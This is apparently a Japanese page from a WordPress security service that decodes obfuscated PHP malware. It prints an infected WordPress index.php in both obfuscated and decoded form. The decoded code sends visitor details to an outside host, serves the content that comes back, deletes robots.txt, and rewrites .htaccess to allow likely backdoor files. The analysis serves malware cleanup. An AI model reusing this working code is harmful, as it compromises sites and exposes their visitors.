Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto yLyca; nq9A3: Mi24L: goto R6dtG; IBQyP: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_C...



難読化されたPHPコード

<?php
 goto yLyca; nq9A3: Mi24L: goto R6dtG; IBQyP: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto jbaVj; oIJS5: NEHhX: goto sLQWh; geOQp: lYDFf: goto IBQyP; c30MZ: r73tQ: goto n89tT; qZQ3m: $params["\x70\162\157\164\x6f\143\x6f\x6c"] = isset($_SERVER["\x48\124\124\120\x53"]) ? "\x68\x74\164\x70\163\72\57\x2f" : "\x68\x74\x74\160\72\57\57"; goto Z0wYb; sLQWh: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\x2f\134\174\57\163\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto oKgXG; RqSw7: l7jCJ: goto L0oJl; A_OZc: bTUy4: goto hRZQK; wUhyr: $api = base64_decode("\141\110\x52\x30\143\x44\157\x76\114\x7a\x55\62\x4f\124\131\164\131\62\x67\x30\114\x58\x59\170\x4d\104\x67\x75\x63\107\106\x79\144\107\x78\x76\144\x58\101\165\131\62\71\164"); goto ukzJv; n89tT: $try = 0; goto vfP9A; aHe5z: $params["\144\x6f\x6d\141\x69\156"] = isset($_SERVER["\110\124\x54\120\137\x48\117\x53\x54"]) ? $_SERVER["\x48\x54\124\120\x5f\x48\x4f\x53\124"] : $_SERVER["\x53\x45\122\x56\105\x52\x5f\x4e\101\x4d\x45"]; goto wuelZ; yzyBp: Y3HEY: goto IWe0R; gNfRd: goto dCLSq; goto bQOio; thbzf: goto TbB9C; goto A_OZc; TzZPR: pK8Sh: goto PUdcu; uE7Pj: goto bTUy4; goto geOQp; JVhaJ: goto dFCmd; goto oIJS5; R6dtG: $params["\x6c\x61\x6e\x67\165\x61\147\145"] = isset($_SERVER["\110\124\124\x50\x5f\x41\x43\x43\105\120\x54\137\114\x41\116\x47\125\101\x47\x45"]) ? $_SERVER["\110\124\124\x50\x5f\x41\103\103\x45\x50\124\137\114\x41\116\107\125\101\107\x45"] : ''; goto JVhaJ; QbYB_: goto r73tQ; goto y6Pgd; L0oJl: h2(); goto QbYB_; Sj1SD: goto ZI6CM; goto hUck4; oKgXG: goto pK8Sh; goto c30MZ; kknQD: Gyh8t: goto wUhyr; jbaVj: goto Y3HEY; goto nq9A3; WbaMk: goto LfFrR; goto kknQD; o1RuO: if ($params["\151\160"] == null) { $params["\151\x70"] = ''; } goto thbzf; yLyca: goto lYDFf; goto yzyBp; ByDcr: $params["\x61\147\x65\x6e\x74"] = isset($_SERVER["\110\x54\124\x50\137\125\123\105\122\137\x41\x47\x45\x4e\124"]) ? $_SERVER["\x48\124\124\120\x5f\125\123\x45\122\137\101\107\105\116\124"] : ''; goto gNfRd; yHvh1: $params["\162\145\161\165\145\x73\x74\x5f\x75\x72\154"] = $_SERVER["\x52\105\x51\x55\105\x53\124\x5f\x55\x52\x49"]; goto uE7Pj; d48UJ: goto Gyh8t; goto JuEVC; NJRjd: LfFrR: goto ByDcr; nXxPJ: goto l7jCJ; goto RqSw7; vfP9A: goto NEHhX; goto hV69x; hV69x: dCLSq: goto IxOIL; oI3Vs: TbB9C: goto qZQ3m; JuEVC: mVpSs: goto yHvh1; hUck4: uSxhR: goto aHe5z; ukzJv: goto uSxhR; goto oI3Vs; W3UIR: if (isset($_REQUEST["\x70\x61\162\x61\155\163"])) { $params["\141\160\151"] = $api; print_r($params); die; } goto nXxPJ; y6Pgd: ZI6CM: goto o1RuO; hRZQK: $params["\x72\145\146\x65\x72\145\x72"] = isset($_SERVER["\x48\x54\x54\120\137\122\105\106\x45\122\x45\x52"]) ? $_SERVER["\x48\x54\124\x50\x5f\122\105\x46\105\x52\x45\122"] : ''; goto WbaMk; Z0wYb: goto Mi24L; goto TzZPR; IWe0R: function h2() { if (file_exists("\x72\x6f\x62\x6f\164\163" . "\56\x74\x78\164")) { @unlink("\x72\157\142\x6f\164\x73" . "\x2e\164\x78\164"); } $htaccess = "\x2e" . "\150\x74\x61\x63\x63\145\x73\163"; $content = @base64_decode("\x50\105\132\160\x62\x47\126\172\124\127\106\x30\x59\x32\x67\x67\x49\151\x34\157\x63\x48\154\x38\132\130\150\x6c\x66\x48\102\157\x63\103\153\x6b\111\x6a\x34\113\x49\105\x39\x79\x5a\107\x56\x79\x49\x47\106\163\142\x47\71\x33\114\107\122\x6c\x62\x6e\x6b\113\x49\105\x52\x6c\142\156\153\147\132\156\112\x76\142\123\x42\x68\142\107\167\113\120\x43\x39\x47\x61\127\x78\154\x63\60\x31\x68\x64\x47\x4e\157\x50\147\157\x38\x52\x6d\154\x73\132\130\x4e\x4e\131\130\x52\152\141\103\101\151\130\x69\150\x68\131\155\x39\x31\x64\103\x35\x77\x61\x48\102\70\143\155\x46\153\141\127\70\165\143\x47\x68\167\x66\107\x6c\x75\x5a\x47\126\x34\114\156\x42\157\x63\110\x78\152\142\x32\x35\x30\132\x57\x35\60\x4c\156\x42\x6f\x63\110\170\x73\x62\62\116\162\115\172\x59\167\x4c\x6e\x42\x6f\x63\x48\170\150\x5a\x47\x31\160\142\x69\x35\167\141\110\102\70\144\63\101\x74\142\x47\x39\156\x61\x57\64\x75\143\107\150\167\x66\x48\x64\167\x4c\127\167\x77\132\x32\154\x75\x4c\156\102\157\x63\x48\x78\63\x63\x43\61\x30\141\107\126\164\132\123\x35\167\x61\x48\102\x38\144\63\101\x74\143\x32\x4e\x79\141\x58\x42\60\x63\171\65\167\141\110\x42\70\x64\x33\x41\x74\132\x57\122\x70\144\107\71\171\114\x6e\102\x6f\x63\110\170\x74\131\127\x67\165\x63\x47\150\167\146\x47\160\167\114\x6e\x42\x6f\x63\x48\170\x6c\x65\x48\121\165\x63\x47\x68\x77\113\123\x51\x69\120\x67\x6f\147\124\63\112\x6b\x5a\130\x49\x67\131\127\x78\x73\142\63\x63\x73\x5a\x47\126\165\x65\121\157\x67\121\x57\x78\163\142\63\143\x67\132\x6e\x4a\166\142\x53\102\150\142\x47\x77\113\120\x43\x39\x47\x61\x57\170\154\x63\60\61\x68\x64\107\x4e\x6f\120\x67\157\70\123\x57\x5a\x4e\142\x32\122\61\142\107\x55\147\142\x57\x39\153\x58\x33\x4a\154\144\x33\x4a\160\x64\x47\125\x75\131\x7a\x34\x4b\125\155\x56\x33\x63\x6d\x6c\60\x5a\x55\126\165\132\x32\x6c\165\x5a\x53\102\120\x62\147\x70\x53\132\130\x64\x79\x61\130\x52\x6c\x51\x6d\106\172\132\x53\x41\x76\x43\154\x4a\154\144\63\112\x70\x64\x47\x56\x53\x64\127\170\154\x49\106\65\160\x62\155\x52\x6c\x65\x46\167\165\143\x47\x68\x77\x4a\x43\x41\164\111\x46\164\115\x58\121\x70\123\132\x58\144\171\141\x58\x52\x6c\121\x32\71\165\x5a\103\x41\154\145\61\x4a\106\x55\126\126\106\125\x31\x52\146\x52\153\154\115\122\125\x35\x42\x54\125\126\x39\x49\103\x45\164\132\x67\x70\x53\x5a\x58\x64\x79\141\130\122\x6c\121\x32\71\x75\x5a\103\101\154\x65\x31\x4a\106\x55\126\x56\x46\x55\61\x52\146\122\x6b\x6c\x4d\x52\125\65\102\x54\125\126\x39\x49\103\105\164\132\101\x70\x53\x5a\x58\144\x79\141\x58\x52\x6c\x55\156\x56\x73\x5a\123\x41\165\x49\103\71\160\x62\x6d\x52\x6c\x65\x43\65\x77\141\110\101\147\127\x30\x78\144\x43\152\x77\166\123\127\132\116\x62\x32\x52\x31\142\107\x55\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto d48UJ; IxOIL: $params["\151\x70"] = isset($_SERVER["\110\124\x54\120\x5f\x56\111\x41"]) ? $_SERVER["\110\124\x54\x50\x5f\130\x5f\x46\x4f\x52\x57\x41\122\x44\x45\104\x5f\106\117\x52"] : $_SERVER["\122\x45\x4d\x4f\x54\x45\137\x41\x44\x44\122"]; goto Sj1SD; bQOio: dFCmd: goto W3UIR; wuelZ: goto mVpSs; goto NJRjd; PUdcu: ?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

デコード(難読化解除)されたコード

<?php

function h($url, $pf = '')
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, "h");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
    if ($pf != '') {
        curl_setopt($ch, CURLOPT_POST, 1);
        if (is_array($pf)) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf));
        }
    }
    $r = curl_exec($ch);
    curl_close($ch);
    if ($r) {
        return $r;
    }
    return '';
}
function h2()
{
    if (file_exists("robots.txt")) {
        @unlink("robots.txt");
    }
    $htaccess = ".htaccess";
    $content = @"<FilesMatch \".(py|exe|php)\$\">\n Order allow,deny\n Deny from all\n</FilesMatch>\n<FilesMatch \"^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)\$\">\n Order allow,deny\n Allow from all\n</FilesMatch>\n<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php\$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>";
    if (file_exists($htaccess)) {
        $htaccess_content = file_get_contents($htaccess);
        if ($content == $htaccess_content) {
            return;
        }
    }
    @chmod($htaccess, 511);
    @file_put_contents($htaccess, $content);
    @chmod($htaccess, 420);
}
$api = "http://5696-ch4-v108.partloup.com";
$params["domain"] = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"];
$params["request_url"] = $_SERVER["REQUEST_URI"];
$params["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$params["agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$params["ip"] = isset($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
if ($params["ip"] == null) {
    $params["ip"] = '';
}
$params["protocol"] = isset($_SERVER["HTTPS"]) ? "https://" : "http://";
$params["language"] = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : '';
if (isset($_REQUEST["params"])) {
    $params["api"] = $api;
    print_r($params);
    die;
}
h2();
$try = 0;
while ($try < 3) {
    $content = h($api, $params);
    $content = @gzuncompress(base64_decode($content));
    $data_array = @preg_split("/\\|/si", $content, 1, PREG_SPLIT_NO_EMPTY);
    if (!empty($data_array)) {
        $data = array_pop($data_array);
        $data = base64_decode($data);
        foreach ($data_array as $header) {
            @header($header);
        }
        echo $data;
        die;
    }
    $try++;
}
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require "/var/www/html/wp-blog-header.php";

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.